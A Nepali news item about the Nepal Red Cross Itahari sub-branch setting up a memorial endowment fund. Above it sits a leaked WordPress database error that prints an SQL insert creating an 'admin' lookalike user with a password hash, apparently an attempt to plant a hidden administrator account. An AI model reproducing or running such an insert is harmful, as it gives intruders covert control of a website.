WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bx.WAzhNfTgjb/PjfNjEuDs3Wqduxz/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:59:08', '', 'admlnlx', 'admlnlx')
इटहरी, पुस ६ –
नेपाल रेडक्रस सोसाइटी इटहरी उप–शाखाले आफ्ना पूर्वज एवम् रेडक्रस इटहरी उप–शाखाका दिवङ्गत सभापतिको सम्झनामा दुई लाख सात हजार राशिको अक्षयकोष स्थापनाको घोषणा गरेको छ ।
नेपाल रेडक्रस सोसाइटी इटहरी उपशाखाका पूर्व सभापति नारायणबहादुर श्रेष्ठ, कृष्णप्रसाद पौडेल र तीर्थराज गौतमले रेडक्रसमा रहेर समाजको अग्रगामी परिवर्तन एवम् सेवामा महत्वपूर्ण योगदान दिए वापत उहाँहरुको योगदानको उच्च मूल्याङ्कन गर्दै सो अक्षयकोष स्थापना गरेको सभापति विमल पौडेलले जानकारी दिनुभएको छ ।
रेडक्रसलगायत अन्य सामाजिक सङ्घसंस्था तथा निकायमा रहेर समाज सेवामा महत्वपूर्ण कार्य गर्नेलाई हरेक बर्ष उक्त कोषको ब्याजबाट प्राप्त हुने रकमले एक जनालाई सम्मान गर्ने उपशाखाले निर्णय गरेको पनि सभापति पौडेलले जानकारी दिनुभएको छ ।- रासस